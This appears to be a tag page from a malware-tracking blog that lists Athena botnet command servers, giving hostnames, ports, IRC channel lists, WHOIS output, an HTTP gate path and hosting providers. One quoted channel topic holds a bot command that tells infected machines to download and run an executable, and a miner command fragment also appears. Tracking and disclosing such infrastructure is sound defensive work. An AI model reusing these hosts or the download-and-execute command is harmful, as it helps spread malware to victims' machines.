Tag: Athena (Athena irc botnet hosted by bhost.co.uk)


Server: Port:  6667 Current global users 104, max 387 Channel:  #razbot #razbot          102     Oper:  [n[ARE|U|L|WIN7|x64|2c]loruybe] (rusho@i.hate.microsefrs.com): … [n[ARE|U|L|WIN7|x64|2c]loruybe] #strike #razbot  [n[ARE|U|L|WIN7|x64|2c]loruybe] irc.foonet.com :FooNet Server [n[ARE|U|L|WIN7|x64|2c]loruybe] is a Network Administrator [n[ARE|U|L|WIN7|x64|2c]loruybe] is available for help. [n[ARE|U|L|WIN7|x64|2c]loruybe] idle 00:09:52, signon: Tue Sep 03 11:45:07 [n[ARE|U|L|WIN7|x64|2c]loruybe] End of WHOIS list. This is the same authhost as another posted athena botnet. Hosting infos:Read more...

irc.tskiller.com (Athena irc botnet hosted by scopehosts.com)


Resolved irc.tskiller.com to Server:  irc.tskiller.com Port:  6667 There are 1 users and 207 invisible on 1 servers Channels:  #kurdish         5         #ddos            13       asf123  #deus            8         #eser            4         #DyntaiLegion    12        #kebab           6         #stud            6         #Kavin           3       [+sntVCT]  #opers           1         #deneme          12        #hack0si         7         #LoL             2         #USA             1         #TizenX          2         #unwrittenlaw    4         #winyle          5         #nirjhar         54    Read more...

allrounders.cc (Athena http botnet hosted by hostkey.com)


Resolved allrounders.cc to Server:  allrounders.cc Gate file:  /1ds2541svc/gate.php This domain was previously used as a backup domain for a now defunct betabot. I guess the owner is trying all the L33T hackforums bots. Hosting infos: http://whois.domaintools.com/ Related md5s (Search on malwr.com to see the sample in action. You can’t download it as someone hatesRead more...

thebankslife.no-ip.biz (Athena irc botnet hosted by shellxnet.com)


Resolved thebankslife.no-ip.biz to Server:  thebankslife.no-ip.biz Port:  6667 Channel          Users   Topic #sexlyfe         2       [+nt] #Syncrude        78      [+sntVCT] !download hxxp://nassau03.nl/russiabm.exe 5 #bankslife       35      [+nt] .gtfo Channel:  #Syncrude Now talking on #Syncrude Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5 Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013) Bitcoin mining info: macromedia.exe” -a scrypt -oRead more...